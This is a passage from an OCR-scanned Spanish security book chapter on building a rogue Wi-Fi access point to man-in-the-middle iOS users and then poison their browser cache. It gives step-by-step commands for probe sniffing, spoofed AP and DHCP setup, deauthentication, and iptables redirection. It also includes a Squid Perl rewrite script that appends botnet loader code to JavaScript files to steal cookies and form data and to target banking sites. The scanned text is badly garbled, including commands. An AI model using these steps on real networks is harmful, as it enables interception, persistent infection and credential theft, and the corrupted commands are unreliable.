La traducción literal de Rogue AP es “Punto de acceso picaro”, y aunque no es una traducción 
desacertada, resulta confusa. En un ámbito más descripti se define Rogue AP como un punto. 
de acceso Wireless con intención de capturar y/o modificar el tráfico generado por los clientes 


conectados. Lo que comúnmente se conoce como Man in the middle (MITM). 


Para que un ataque de este tipo tenga éxito, hay que determinar una serie de factores, como por ejemplo 
el tipo de cliente al que va dirigido el ataque o si el AP va a suplantar a uno lícito ya existente. En cl 
caso de ataques no dirigidos, orientados a víctimas confiadas y con pocos conocimientos técnicos, 
será suficiente con configurar un AP sin ningún tipo de citrado ni autenticación. Lin cambio, para 
realizar una suplantación en una red concreta, es necesario conocer con todo detalle la configuración 
de los puntos de acceso de la red a suplantar. 


Por lo general la usabilidad es inversamente proporcional a la seguridad, y es de esto de lo que se 
valen los atacantes. Se busca que cualquier usuario final, sin grandes conocimientos en la materia 
en cuestión, pueda configurar y manejar de mancra rápida, cómoda y sencilla, cualquier elemento 
software o hardware. Hay muchos ejemplos de esto, se puede hablar de la tecnología WPS (Wi- 
Fi Protected Setup) que ofrece al usuario una conexión instantánea desde su dispositivo al punto 
de acceso. con una simple pulsación de botón (físico) en el punto de acceso o a través de un pin 
numérico de cuatro los, quedando configurada su conexión Wi-Fi sin necesidad de introducir la 
clave de la red. Dicho de otra forma, se procede al traspaso de credenciales desde el punto de acceso 
al dispositivo cliente, con una pulsación de botón, o con un pin numérico. No importa si la clave 
generada es mayor de los 21 caracteres, si estos son alfanuméricos, mayúsculas y minúsculas, y 
caracteres especiales. Introduciendo un pin de cuatro dígitos, el dispositivo queda asociado. 


Pero la característica más importante de la que aprovecharse en un ataque de suplantación de punto 
de acceso es el conocido Conectar automáticamente. Cuando un cliente se conecta por primera vez a 
unared, o la configura manualmente, es habitual y cómodo utilizar la función de conexión automálica, 
así la próxima vez que entre en el alcance de la red, el dispositivo automáticamente se conectará. 
El problema surge cuando, en una red con múltiples puntos de acceso, el dispositivo se conecta al 
punto de acceso que le ofrece mayor potencia (generalmente el más cercano), y es en lo que se basa 
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una buena suplantación del punto de acceso. Es decir, si el punto de acceso suplantado ofrece mayor 
potencia que el punto de acceso original, los clientes con la función Conectar automáticamente 
habilitada se conectaran al punto de acceso suplantado sin ni siquiera hacer clic. No solo eso sino 
que además con las herramientas estándar de conexión Wi-Fi, no aparecerá una red por cada AP, 
sino que solo aparecerá una, y será el propio sistema operativo quien decida a que AP conectarse, 
basándose en la potencia de señal recibida de cada punto de acceso, incluyendo al AP suplantado. 


Existen diferents 
Acces! 


m p 
la señal cableada en ondas, y generalmente incorporan un y servidor DI parao e 

a los clientes. Ls decir, no hace la función de un router ni de un switch, El router “de casa”, utilizado 
por todos para conectarse a Internet es a su vez punto de acceso inalámbrico, enrutador entre redes, 
y módem WAN para la salida a Internet. Al igual que un punto de acceso inalámbrico, dispone de 
servidor DHCP para asignar IPs automáticamente a los clientes conectados. En el caso de una tarjeta 
Wi-Fi cliente estándar se necesita de alguna utilidad para utilizarla como punto de acceso, y software 
específico en la máquina para crear un servidor DHCP. 


Ll ataque consiste en que las víctimas se conecten a un punto de acceso que consideran de confianza 
(ya sea conectándose automática o manualmente), y una vez conectadas ver el tráfico que generan, 
Para ello es necesario disponer de una máquina controlada por el atacante, donde llegarán las 
peticiones de las víctimas. Para conseguir esto es necesario configurar un servidor DHCP (como ya 
se ha mencionado, los puntos de acceso y los ruuter lo tienen integrado) para establecer que la puerta 
de enlace de la conexión sea el equipo preparado por cl atacante. Para completar el ataque y hacerlo 
transparente, la máquina atacante ha de enrutar el tráfico entre la víctima e Internet 


Aunque es cierto que no se pueden considerar vulnerabilidades, ¡OS presenta una serie de debilidades- 
que le haeen propicio a ser víctima en la suplantación de puntos de acceso Wi-Fi. 


- Conexión a redes conocidas: En ajustes del sistema se presenta un selector de título 
“Preguntar al conectar”, que la mayoria de usuarios interpreta como una opción para 
conectarse automáticamente a redes conocidas, o no hacerlo. Esto no es cierto, como se puede 
comprobar al leer la letra pequeña de esta opción. En cualquiera de los casos, el dispositivo 
se conectará a él automáticamente si encuentra una red conocida, mientras que aparecerá un 
mensaje con las redes disponibles para su conexión si se activa el selector, o se deberá ir al 
panel de configuración Wi-/7i y conectarse manualmente en caso de desactivar esta opción. 


|: Redes conocidas, 
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- Lista de redes conocidas: ¿Los dispositivos ¿OS guardan aquellas redes a las que los 
Usuarios tiene consideradas como de confianza, es decir, aquellas a las que se marca “conectar 
automáticamente”. El problema surge cuando se quiere eliminar un perfil Wi-Fi, ya que 
iOS no muestra en ningún caso las redes conocidas, y solo será posible eliminarlas cuando 
el dispositivo se encuentre en el alcance de la red. En caso de disponer de un dispositivo 
desbloqueado, se ar los perfiles Wi-Fi almacenados accediendo al fichero base 
de datos llamado keychain-2.db. 


- Politica de elección de red: En el caso de encontrar múltiples redes conocidas al alcance 
del dispositivo, este establecerá el orden basándose en la última red a la que se haya conectado. 
Urilizará un sistema LIFO basándose en la última fecha de conexión. 


- Reconocimiento de redes: El mayor problema en cuanto a redes conocidas reside en que 
los dispositivos ¡OS reconocen las redes a las que ha estado conectado únicamente por su 
SSID (el nombre de la red) y su seguridad. es decir, cifrado y password. Es de esto de lo que 
se beneficiará un atacante para suplantar las redes conocidas. 

- Información minimalista: En la información que sc muestra a los usuarios sobre una red 
Wi-Fi en iOS, no se diferencia entre si es una red de infraestructura o ad-hoc, lo que permite 
engañar más fácilmente a los usuarios. 


Pero que desde el propio dispositivo no se puedan ver las redes Wi-Fi conocidas que no se encuentren 
al alcance, no significa que un atacante no pueda hacerlo. De hecho es suficiente con capturar 
paquetes “en el aire” para descubrir a que redes intenta conectarse. Se puede hacer uso de la suite 
airerack-ng, concretamente airodump-ng para monitorizar todas las redes disponibles, los clientes, 
y el nombre de aquellas que el dispositivo está buscando p para conectarse automáticamente. Es tan 
sencillo como ejecutar la aplicación y fijarse en el campo Probe, donde irán apareciendo los SSID 
separados por comas. 


(not associated) HIDALGO 
(not associated) 


(not associated) 
(not associated) 
(not associated) 
(not associated) 
(not associated) 


Imagen 11.02: Probes de una captura de airodump-ng. 


2.Preparando el entorno Linux 


Como se ha dicho anteriormente, el equipo atacante ha de realizar la función de router utilizando dos 
interfaces de red, una para comunicarse con el AP suplantado, y la otra con salida a Internet. Estas 
dos interfaces pueden ser cablcadas, Wireless, o incluso una combinación de ambas. 
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Para este ejemplo, se utilizará una interfaz cableada, de nombre eth0 conectada al punto de acceso 
utilizado para la suplantación, y una interfaz Wireless de nombre wlan0 conectada a una red Wi-Fi 
de confianza con salida a Internct. Para que el equipo atacante haga la función de router, se tiene 
que cumplir que las interfaces tienen que estar configuradas como subredes independientes, y que 
el enrutamiento sera varios métodos para habilitar esta función, unos temporales 
(hasta que el equipo se reinicio) y otros permanentes. El modo temporal se habilita modificando el 
tichero ip forward que se encuentra en el directorio ¿procisysfnettipvá, estableciendo el contenido 
de dicho fichero al valor 1. La modificación es posible realizarla con cualquier editor de texto, o 
mediante el comando echo con la salida redirigida al fichero citado: echo 1 > /procísys/net/ipvd/ 
ip forward > . 


root@ubuntu:/home/i64# echo 1 > /proc/sys/net/ipv4/ip_fonsard) 


CA y 


Imagen 11.03: Comando ceho redirigido al fichero ip_forward.. 


Otra manera de habilitar la función de rowting temporal es mediante el comando sysell, con la 
siguiente instrucción: spsell -w nel.ipv4.ip_forward=1 > 


rogteubuntu:/home/1642 sysctl -w net.ipws.ip forward=1 
ot. ipvd.ip Forward = 


Imagen 11.04: cl de configuración para ¿p_ forward. 
En el caso de necesitar que la modificación sea permanente, se modifica el fichero setl.conf 


y se establece el valor 7 a la directiva nel.ipv4.ip forward, o se añade la línea si no a vez 
modificado y guardado, se recarga este fichero mediante cl comando sysctl -p /ete/sysetl.conf. 


fet. ipv4.ip foruard=1 


Get a lo E Rend Fil Cut Text] cur Pos 
Exit o Mexe Paal Uncut Te To Speil 


Imagen 11.95: Fichero Slam i 


Fs necesario enmascarar lodo cl tráfico de la interfaz cableada para enviarla por la interfaz 
inalámbrica, dado que pertenece a otra subred. En caso contrario, el router que se encuentre tras 
la red Wi-Fi descartará los paquetes, dado que no reconoce la dirección IP de origen. Mediante cl 
ASQUERADE a la nat de la interfaz w/an del equipo. 


comando iptables se realiza e 


Imagen 11.06: Comando ¡p/ables para enmascarar el tráfico. 
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3. Configurando el punto de acceso 


Como ya se ha mencionado, lo importante en una suplantación de este tipo es conocer toda la 
información posible de la red que se va a suplantar, para configurar el AP con los datos obtenidos. 
Aunque existen múltiples maneras de configurar un AP (telnet, puerto de serie en dispositivos 
antiguos, etcétera), la manera más rápida y sencilla cs a través del cliente web. Hay que destacar que 
no todos los firmwares de los puntos de acceso y routers permiten una configuración válida para cl 
ataque que se quiere realizar, por motivos que se verán más adelante. 


Cuanta mayor información se tiene, más víctimas potenciales hay. En el caso de querer aprovecharse 
de la inocencia de la víctima, y crear una red abierta sin cifrado ni autenticación, la configuración 
que se establece en el punto de acceso pierde importancia. Únicamente hay que tener en cuenta que 
la puerta de enlace que proporciona el DHCP sea la máquina atacante por la que pasará el tráfico, 
independientemente del nombre de la red que se configure en el AP y el rango de direcciones a 
utilizar. 


Al contrario que ocurre con la configuración anterior, es esencial tanto cl nombre de la red, como 
su autenticación y cifrado. El rango de dirceciones a utilizar puede no ser demasiado importante, 
pero para usuarios con conocimientos medios que entiendan de protocolo TCP/IP, les resultará 
sospechoso si el rango de direcciones IP proporcionadas por el punto de acceso suplantado difiere 
de la ofrecida por el punto de acceso lícito. Es por ello que cuanto más se asemeje el AP ilícito al 
punto de acceso real, menos sospechas levantará, Evidentemente, si se quiere suplantar un punto 
de acceso con clave de acceso, es necesario conocer esta. En el caso de claves WEP, WPA-PSK y 
WPa2-PSK (clave compartida) la suplantación será tan compleja como difícil sea obtener esta clave 
(en el caso WEP, es prácticamente nula). Para redes con WPA y WPA2 (en ocasiones calificada como 
Enterprise), es necesario crear un servidor Radius encargado de validar los usuarios conectados. 
Esto es posible mediante el freeware freeRadius, que se puede configurar (con un script PHP por 
ejemplo), para guardar los valores de usuario y contraseña introducidos por la víctima. En tal caso 
siempre serán considerados válidos y aprovechando cl ataque, será posible conseguir algún usuario 
real para la validación Radius de la red que se está suplantando. 


Imagen 11.07: Tipos de cifrado disponibles en un AP. 


Tomando como primer ejemplo el caso más sencillo, el de una red abierta sin cifrado, la configuración 
consiste en establecer el nombre de la red (ESSID). habilitar el DHCP con un rango de direcciones 
IP cualquiera (vale el más común, 192.168.0.0/24) y lo más importante. estableciendo la puerta de 
enlace a la dirección IP de la máquina atacante. 
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Es decir, algunos dispositivos no permiten establecer la puerta de enlace del servidor DHCP. por 
lo que el equipo victima no enviaría el tráfico al cquipo ulucante, y la suplantación dejaría de tener 
sentido. Aunque el £SS/D puede ser cualquier nombre. hay que tener en cuenta que cuanto menos 
sospecha levante, más clientes se conectarán, por lo que es más efectivo poner un nombre como 
Casa en vez de Conexión Gratis. 


Prueba de concepto 

Para la prueba de concepto, se utilizará un dispositivo AP físico, concretamente cl modelo DWL- 
22004P del fabricante D-Link, y un equipo con un sistema operativo Linux, en este ejemplo la 
distribución Ubuntu. Antes de nada, se establece una IP estática en la interfaz erh0 de la máquina 
conectada al punto de acceso que se va a configurar, en este caso 192.168.0.5. La otra interfaz de red 
de la máquina, w/an0 se conecta a una red con salida a Internet, Hay que recordar que ambas redes 
deben tener rangos IP diferentes, para que la función routing tenga sentido. 


Introduciendo en el navegador la dirección IP del dispositivo AP, se conecta al panel de 
administración, donde una vez introducido el usuario y la contraseña se accede a la configuración, 
A pesar de encontrar infinidad de categorías y opciones. lo único interesante para la suplantación es 
la configuración Wireless, y el servidor DHCP. Para una primera prueba, se va a configurar una red 
abierta. En la sección Wi-Fi, se elige el nombre de la red (ESSID) que se quiere emitir, por ejemplo 
MiCasa. La seguridad se establece como OPN, y se cligo un canal cualquiera. 


Wireless Band JEEEBO2 1g Y 


Mode [Access Point 
Wireloss Notwork Name(SSID) [His 
SSI) Broadcast [Enabie v] 
Channel [i Y] amaron T Auto Channel Scan 
Authentication [Epen System y] 

Kuy Sellings 
Encryption 


@ Disable CEnable 


Lmagen 11.08: Configuración para una red skiera. 


Para la sección de servidor DHCP, se habilita la función y se configura la IP a partir de la cual el 
servidor ofrecerå direcciones, por cjemplo 192.168.0.100, con un máximo de 100. La máscara de red 
la más común, 255.255.255.0, y lo más importante, cl Gateway introduciendo la dirección IP de la 
interfaz de red conectada al AP, 192.168.0.5. Posiblemente, el AP necesite reiniciarse, mientras lanto 
se habilita la fimción de router de la máquina con alguno de los métodos ya citados. 


Function Cnabla/Disable 


1P Assigned From 
The Range of Pool (1-255) [ua] 
Suba m 7] 
Gateway [s2105 


Imagen 11.09: Configuración DIICP con rango por defecto. 
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Cuando el AP vuclva a estar operativo. con el dispositivo ¡OS se buscan las redes Wi-Fi disponibles, 
entre las que debería aparecer MiCasa y se realiza la conexión a ella. Si la configuración ha sido 
correcta, abriendo el navegador se debería poder navegar sin ninguna dificultad. Para comprobar 
que el co está pasando por la máquina recién configurada, nada mejor que utilizar la herramienta 
Wireshark y capturar los paquetes de la interfaz del AP, e//+0. Otra opción más visual es la utilidad 
drifnet, cuya interfaz gráfica es una simple ventana donde irán apareciendo las imágenes capturadas 
del tráfico de red gencrado por los dispositivos conectados al AP. 


Imagen 11.10: Herramienta drifier captura 


Como segunda prueba de concepto, se va a configurar una red más compleja, con seguridad WPA2- 
PSK y un rango IP no estándar. Como ya se ha mencionado, para una suplantación de este tipo es 
necesario conocer previamente la clave de la red que se va a suplantar. En el caso de no disponer 
de esta clave, se podría intentar utilizando el mismo FSSID de la red original y dejando la red sin 
seguridad, buscando esos clientes incautos. 


Lo primero a configurar en el AP es la dirección IP del propio dispositivo, ya que la red a 
configurar utiliza un rango diferente al establecido por defecto. Suponiendo que esa red trabaja en 
cl rango 192.168.64.0/26, se establece la IP del AP en 192.168.64.1 y la máscara de subred como 
255.255.255.192. Mientras el dispositivo se reinicie, en el equipo atacante también se modifica la 
TP de la interfaz e/h0 a 192.168.64.5 para pertenecer a la misma subred que la recién asignada al 
dispositivo AP. Se vuelve a la configuración del AP, sección Wi-Fi y se configura el ESSID con 
el mismo nombre que el AP original. en este caso 4P48L. El mismo nombre significa respetar los 
caracteres exactamente iguales, con mayúsculas. minúsculas etcétera. El tipo de seguridad, como se 
ha definido para el ejemplo es WPA2-PSK, y la clave que ha sido obtenida del punto de acceso lícito, 
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También hay que tener en cuenta el canal en el que está emitiendo el punto de acecso, ya que al ser 
un AP suplantado, el alcance de las ondas puede quedar minado por interferencia con el punto de 
acceso lícito. Es por ello una buena práctica utilizar un cana! con un salto de dos posiciones respecto 
al original. 


Wireless Band 
Mode 


Wireiess Network Nama(S51D) 


Ciphar Type Group Key Update Intesval— MA 
PussPluase [sonsoessoccreanos: 


Imagen 11.11: Configuración Wi-#} de una suplantación de AP con WPA2-PSK. 


En cuanto al DHCP, como se ha mencionado anteriormente, se configura con el nuevo rango, 
siendo la IP inicial 192.168.64.10 y cl máximo de direcciones IP a asignar 52 (hay que recordar 
que con esta subred, la última IP disponible es 192.168.64.62). Al igual que antes, el Gateway es 
la dirección de la dirección establecida en erh0 de la máquina, 192.168.64.5. Una vez aplicados los 
cambios y reiniciado el AP, se realiza la misma prueba con el dispositivo ¿Phone para comprobar 
que, efectivamente, el tráfico “pasa” por la máquina atacante. 


Function Enable/Disable [Enobie vw] 


IP Assigned From 

The Range of Pool (1-255) 
SubMask 

Gataway [1a2 168.64.5 


Imagen 11.12: DHCP para un rango TP personalizado, 


Como alternativa a un dispositivo AP físico, se dispone de herramientas capaces de crear una red Wi- 
Fi mediante una tarjeta Wireless cliente estándar (aunque no todos los modelos son compatibles). La 
herramienta más conocida para este propósito es airbase-ag, incluida en la suite de auditoría Wireless 
Aircrack-ng. Hay que tener en cuenta que esta utilidad es capaz de “convertir” la tarjeta Wireless 
en punto de acceso, pero además de esto hace falta un servidor DHCP que asigne dirceciones TP 
válidas a las victimas, utilizando para cllo el famoso servicio dhcp-server. Hay que tener en cuenta 
que dado que la tarjeta inalámbrica se utiliza para crear el punto de acceso, será la interfaz cableada 
la que proporcione salida a Internet. Es necesario adaptar el redireccionamiento de ¿iprables para la 
nueva configuración. 


- Enel fichero /erc/dhcp/dhcpd.conf se establece la configuración que utilizará el servidor 
dhcp para distribuir las direcciones IP. 
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Jidns-upcate-style none; 
ion comain-name-servers 192.168.69.5; 
Frult-Lease-tine 
-lease Limo 72; 
uthoritatave; 
og-facility local7; 
ubnet 192.163.69.9 netnask 255.255.255.0 4 
[range 197.188.69.33 192.169.69.254; 
[ption routers 192.163.89.5; 
[ption domain-name-servers 192.168.89.5; 
authoritative; 
parat ama fi none; 
sel 


Taull lonse time 609; 
-lease-tine 7209; 


[tan routers 1.1.1. 
el domain-nane-servers 1.1.1.1; 


Write0ul Road File [Ej Prov Page [E] Cut Text ur Pos 
Justify Where Is Next Page MI UnCut Text [Ej To spell 


Fichero de configuración del servidor DHCP. 
- 


- Se configura la tarjeta inalámbrica en modo monitor: airmon-ng start wlan0. 


t oot@ubuntu:/home/i54# airmon-ng start wlan® 


h mde 


Imagen 11.14; Se establece la tarjeta inalåmbrica en modo monitor, 


- Con- airbuse-ng, se determina la uración del punto de acceso, y comienza a emitir: 
arta E PIONEROS -C 2 -c 6 -essid ratis mon0. 


lrootéubuntu:/home/is44 airbase ng -I 198 -P -C 2 -c 6 --essid MiCasa mono 


Imagen 11.15: Comundo airbase-ng para la creación del AP, 


- Sele asigpa una dirección IP a la interfaz inalámbrica en modo monitor: ifconfig mon0 
192.168.0.5. 


rootgubuntu:/hore/164£ ifconfig 192.168.0.5 
~ = 


Imagen 11.16: Se establece ls dirección IP estática. = 


- Utilizando la configuración previamente creada, se lanza el servicio dhcp para la interfaz. 
que hace de punto de acceso: dhcpd -cf /etc/dhcpídicpd.confmonl 
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Imagen 11.17: 


iciando el servicio DHCP. 


Para ambas pruebas. si se quiere que el ataque sea más efectivo, es posible realizar una denegación 
de servicio a todos los clientes asociados a un punto de acceso Bien sea a los puntos licitos,(para 
forzar la conexión al suplantado), o a cualquier punto de acceso al que se tenga alcance,(para que 
sean los propios usuarios los que busquen una red a la que conectarse, al comprobar que su red actual 
no permite concclarse). Este ataque se puede hacer de manera temporal o indefinida, mediante la 
herramienta aireplay-ng incluida también en la suite aircrack-1g. 


Dicha herramienta permite varios tipos de ataque. como autenticación falsa o reinyección de paquetes 

ARP, pero la que realmente interesa en este ámbito es la “deautenticación” de clientes legítimos. La 

sintaxis de aireplay-1ng para un ataque de este tipo es la siguiente: 

Ai -0 <r a enviar> -a <Mac del punto de acceso> -c <mac del cliente 
> <interfaz Wireless> 


En el caso de no introducir la opción ¢, serán todos los clientes conectados los afectados por cl 
ataque. 


odian alan de clientes, 


4, Ataque de infección de ficheros JavaScript 


Una vez que se ha comprobado que todo el tráfico de las víctimas viaja a través del equipo atacante, 
se implementa un ataque de infección de caché de navegador, utilizando los propios ficheros que las 
victimas solicitan en la navegación web para infectarlas. 


El proceso de infección consiste en añadir código malicioso (llamado pasarela) a los ficheros 
JavaScript que se devuelven en cada petición http de las víctimas. Esle código malicioso es el 
encargado de llamar al fichero payload de un equipo atacante con dirección pública en Internet, 
donde reside una Botnet JavaScript, para gestionar y almacenar toda la información enviada por 
cada víctima, Para ampliar el alcance y la persistencia de la infección, a estos ficheros ./avaSeript 
originales infectados se les modifica la fecha de expiración para que caduquen a los 3000 días (a 
efectos prácticos, imperecederos). 
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Esta Botnet, creada para la ocasión, dispone de sus propios payloads para extraer información y 
ejecular código JavaScript sin el consentimiento de las víctimas, Coma se verá más adelante, cxisten 
herramientas públicas muy avanzadas basadas en JavaScript y con multitud de payloads, por lo que 
es posible utilizar estas sin necesidad de crear una personalizada. 


Pura conseguir añadir contenido a los ficheros JavaScript e infectarlos. es necesario contar con un 
proxy, cuya función es reescribir los ficheros js dirigidos a la victima. Como todo el tráfico pasa por 
la máquina atacante (MI''M), ella misma puede albergar el software proxy y modificar estos ficheros. 
La idea es crear un proxy entre la interfaz de red que recibe el tráfico de la víctima, y la interfaz que 
da acceso a Inlerncl. Además, es necesario que este proxy sea transparente, redirigiendo el tráfico 
http entrante por el puerto 80, al puerto donde reside el proxy y viceversa. Una vez infectado el 
fichero, se guarda en una ruta local donde Apache esté configurado con cl módulo mod_expires para 
cambiar su tiempo de expiración, y finalmente enviárselo a la víctima. 


Los ficheros infectados se guardarán en caché del dispositivo durante tiempo indefinido, por lo que - 
el ataque es persistente, incluso fuera de la red suplantada. Cada vez que la víctima acceda a una 


web donde se utilice un fichero JavaScri des con anterioridad en la red suplantada, , n 
e lo leerá de su propia caché. 
Prueba de concepto 


realizará una petición al fichero origen, si 

Para reulizar la prueba de concepto, se dispondrá de dos máquinas atacantes, una con TP pública 
accesible a través de Internet que albergará la Boret, y otra encargada de infectar víctimas mediante 
la suplantación de AP. 


En la máquina pública es necesario configurar un servidor Apache para albergar la Bomet JavaScript 
cuyas dependencias son: MySyl para almacenar toda la información de las víctimas, y PHP como 
motor de la propia Borner. Para facilitar la instalación de estos tres elementos se puede recurrir a 
soluciones como a h Apache MySql PHP), un paquete para instalar y configurar todos 
los requisitos del server de una vez. Se crea un directorio virtual en Apache, de nombre poison, que 
contiene el portal de administración de la Borneí y los payloads disponibles, a los que se llamará 
desde el código JavaScript malicioso. La máquina ya está prepara para servir los payloads a las 
víctimas y controlarlas con el panel de control. 


En el equipo encargado de la infección, el software a utilizar es SQUID, un proxy de software libre, y 
el servidor Apache. La instalación de estos es trivial, siendo do más cómodo realizarla a través de un 
gestor de paquetes como apt-get, aptitude o pacman. La única función de Apache en esta máquina 
es la funcionalidad que ofrece el módulo de modificación de expiración de caché. 


Para habilitarlo, basta con mover el fichero mod_expires del directorio /ete/apache2/modules_ 
avaibable al directorio /ete/apache2/modules enabled. Si se quiere hacer mediante consola, 
el comando a ejecutar es el siguiente:” a2enmod mod_expires” con privilegios suficientes. La 
configuración del módulo se realiza a través del fichero .htaccess del directorio donde residan los 
ficheros a los que se quiera modificar la expiración. Se crea un directorio temporal para almacenar 
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los ficheros infectados, en la ruta /var/www/tmp y se genera el fichero ./access con un editor de 
texto, al que se le introduce la configuración del módulo de expiración. 


Expiresactive On 
pirasDefault "access plus 3000 days" 


Get Heli] writeouif] Read Fiif] Prev Cur Pos 
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Imagen 11.19: Fichero -htaccess con la configuración para maed espres. | 


La configuración de un proxy es larga y tediosa como así lo demuestra el fichero squid.conf, por 
suerte la funcionalidad que se necesita que cumpla es concreta y sencilla. Lo primero es establecer el 
puerto en el que SQUID va a escuchar. Por defecto es el 3128 y no hay necesidad de cambiarlo, pero 
sí de añadirle el atributo transparert para que el proxy pueda funcionar en modo transparente. Lo 
siguiente a configurar es la permisividad del proxy, que habitualmente es configurada para bloquear 
y controlar, y en este caso interesa permitir todo. Para ello se establece la directiva Artp_access en 
allow all. 


La directiva más importante a configurar en el proxy es url_rewrite_program. Esta indica la aplicación 
o script encargado de procesar las peticiones, y retornar una URL en base a cada petición. Ln este 
caso concreto, va a ser esta directiva la encargada de infectar los ficheros JavaScript, utilizando para 
ello un script en Perl. 


squid normally listens to port 3128 
http port 3128 transparent 


And finally deny all other access to this proxy 
ttp_access deny all 


rttp_arcess allow all 
By default, a URL rewriter is not used. 


Default: 
url_rewrite progran /etc/squid3/poison.pl 


Get Help Writegut Road File Prev Page Cul Text Cur Pos 
B Exit Justify Where Is Next Page UnCut Text To Spell 


Imagen 11.20: Configuración de SQUID. 


Este seript revisa cada petición. y para aquellas que cumplen con la expresión regular de un fichero 
con extensión js, se realiza la descarga del fichero de la petición, se almacena en el propio equipo 
(utilizando como nombre de fichero el identificador de proceso actual, y un contador). concretamente 
en la carpeta temporal habilitada para la modificación de expiración de caché, al que se le concatena 
el código JavaScript malicioso, contenido en el fichero con nombre pasarela.js. 
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Es /usr/bin/pert 


chomp $; 
o ESTAA 


Surl = Sl; 
systen{"/usr/bin/uget", *-q", *-0", */verjat/tap/Spid-$count.js", *Surl*); 
system{ "chmod orr /var/uwe/tp/Sp1d-Scount.J5"); 

system("cat /etc/squid3/pasarela. js >> /var/www/trp/Spid-Scount.js*) 
print "hilp://127.9.0.1:59/tmp/8p1d-Scount. jan" 


print “500% 


Scout; 


Imagen 11.21: Seript Per! paca la directiva url_rewrite_program. 


Lste código será el que se ejecute en la máquina víctima, para asi realizar las acciones programadas. 
En el caso de la Botnet desarrollada, se llamará al fichero payload.PHP alojado en el servidor 
público, para reportar su identidad mediante jsonip. PHP encargado de reportar el identificador de la 
víctima. Utro caso puede ser la comunicación con BeEF (como se verá más adelante), o la ejecución 
de un payload directamente. 


Dado que es una prueba de concepto. para mostrar efectiva la infección en el cliente, en vez de 
utilizar el fichero pasarela,¡s de conexión a ornet, se “utilizará el fichero alert, js cuyo contenido es 
una función para mostrar un mensaje de alerta a la victima. Hecho esto se retorna la ruta del fichero 
infectado recién creado al cliente, de una manera totalmente transparente y funcional. 


El último paso consiste en redirigir el tráfico http de la interfaz de red conectada al AP, al puerto en el 
que escucha el proxy, en este caso el puerto por « fecto, 3128. En Limu es lan fácil como establecer 
una correcta política Mar ar mediante el comando iptables. además de enmascarar las peticiones de la 
interfaz conectada al AP, redirigidas a la interfaz con salida a Internet como se ha hecho antes. 


F 
-F -t nat 

-t nat -A POSTROUTING -o wland -j MASQUERADE 

-t nal -A PREROUTING iethð ptep dport 89 -j REDIRECT to port 3128 

-A INPUT -j ACCEPT -n state --state NEW ESTASLISHED,RELATED -i ethê -p tcp --dport 3128 
A OUTPUT j ACCEPT -m state -state NFM, FSTARLTSHED, REI ATFD -o ulard -p tep -dport AB 


A ANPUT -j ACCEPT -m state --state ESTARLTSHFO,RFI ATFD -o Stho -p tep --sport 80 
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Imagen 11.22: Sep de redirección y enmascaramiento. - 
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Para comprobar su funcionamiento, se conecta el dispositivo iPhone a la red Wi-Fi suplantada, y se. 

y ualquier web desde el navegador. Aunque en el dispositivo la navegación es completamente 
o er pl PON ss: rude N hasi z 

normal, todos los ficheros js que el navegador ¡licita se le retornan infectados, además de quedar 

almacenados en su propia caché con una expiración de 3000 días. El punto más fuerte en este 

tipo de ataque reside en que una vez fuera de la red suplantada, cualquier petición que este mismo 

dispositivo haga a una web en las que se solicite el mismo fichero JavaScript, volverá a ejecutar el 

Payload y reportará datos nuevamente al servidor donde reside la Botner. 


http://www.apple.com 


Has sido infectado! 


'ichero js infectado con alert en iPhone, 


Lin esta prueba de concepto la Botnet recoge datos de las víctimas como direcciones web visitadas. 
ni fla dae mcr pr 
cookies y valores los en formularios, aunque el potencial que ofrece es enorme. Hay que | 


tener'en cuenta que a pesar de que las víctimas ya no estén en el AP suplantado, y el ataque MITM | 
e ivo, se puede afirmar que sigue persistiendo el ataque llamado Man in the tah, donde 

cl único ámbito del ataque es la propia pestaña del navegador donde se está ejecutando el código 

JavaScript malicioso. > 


Imagen 11. 


Hasta ahora todos los ataques y la recolecta de información ha sido indiscriminada, sin ningún tipo 
de criterio. Pero también existe la opción de realizar un ataque dirigido, seleccionando qué ficheros 
JavaScript de qué web infectar, y sin la necesidad de que la víctima visite dicho sitio web. Esto 
es útil para infectar ficheros de webs que la víctima no visitaría en lugares donde no confíe, como 
bancos, pero si lo hará en un entorno de confianza con una red que pueda administrar. 


El primer paso es elegir el JavaScript a infectar. Para ello se elige la web, y se busca en su código 
fuente la etiqueta H'ML de carga de un fichero ys estático. Este será cl fichero que la víctima se 
descargará y se infectará sin ni siquiera saberlo. Además de añadirlo a su caché con expiración 
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infinita para sus próximas visitas en una red de confianza. Después se modifica cl pavload con 
la instrucción de escribir cl fichero js elegido en el fichero que actualmente se está descargando. 
Dicho de otra manera, se infecta un fichero JavaScripi quc la víctima haya solicitado incluyéndole 
la petición del fichero js elegido para cl ataque dirigido. Este fichero volverá a ser infectado y 
almacenado en caché, para su futura utilización. 


Una vez que la víctima se encuentre en un entorno confiable. como su propio hogar y su propia red, 
visitará webs que no visitaría en otro entorno como por ejemplo, como ya se ha mencionado antes, 
su banco. Al realizar la petición de la web, solicitará el js elegido anteriormente, y cargará ese fichero 
infectado de la caché, por lo que se volverá a conectar a la máquina pública donde se encuentra el 
portal de administración de la Botnet y se podrá continuar con el ataque. 


El hecho de que el ataque tenga continuidad una vez que la victima se encuentre fuera de la red 


suplantada no solo permite ataques dirigidos, sino que obteniendo la dirección 1P de la víctima se 
puede realizar un seguimi: geográfico a RE e los diferentes servicios de geolocalización de 
las direcciones IP disponibl les en Internet. Aunque es cierto quesu precisión no es la de un sistenta 
GPS, permite conocer, por ejemplo, si ha salido de la ciudad. 


Visto el funcionamiento de la infección de JavaScript, lo primero que se puede pensar es en 
desactivar la ejecución JavaScript en el navegador del dispositivo, pero además de perder gran parte 
de la funcionalidad de las webs actuales, esto no asegura la no ejecución de código JavaScript como 
sc verá a continuación. Además, aunque cl cliente haya deshabilitado JavaScript, hay que tener 
en cuenta que no solo con JavaScript se pueden capturar datos del cliente y manipularlos, ya que 
existen otras in; mes, basadas en CSS, WML, SVG y otros lenguajes que soporta el navegador 
que podrían permitir comportamientos similares. 


Por último, se descubrió que en ¿OS 6, iOS 6.0.1 e iOS 6. 0.2 existe un bug, catalogado con el 
CVE-2013-0974, que permite habilitar JavaScript en una página wcb aunque el usuario lo haya 
deshabilitado en las preferencias. - 


Ll bug existe en la característica de Smart App Banner, que permite promocionar una aplicación de 
App Store desde cl navegador, para lo que se puede comprobar si la app en cuestión está ya instalada 
(para abrirla) o si no lo está (para abrir el enlace en la App Store). UL problema es que para comprobar- 
si la aplicación promocionada cs compatible con el dispositivo que se encuentra visitando la web, 
es necesario JavaScript, y si el terminal no lo tiene habilitado, lo habilita directamente y sin ningún 
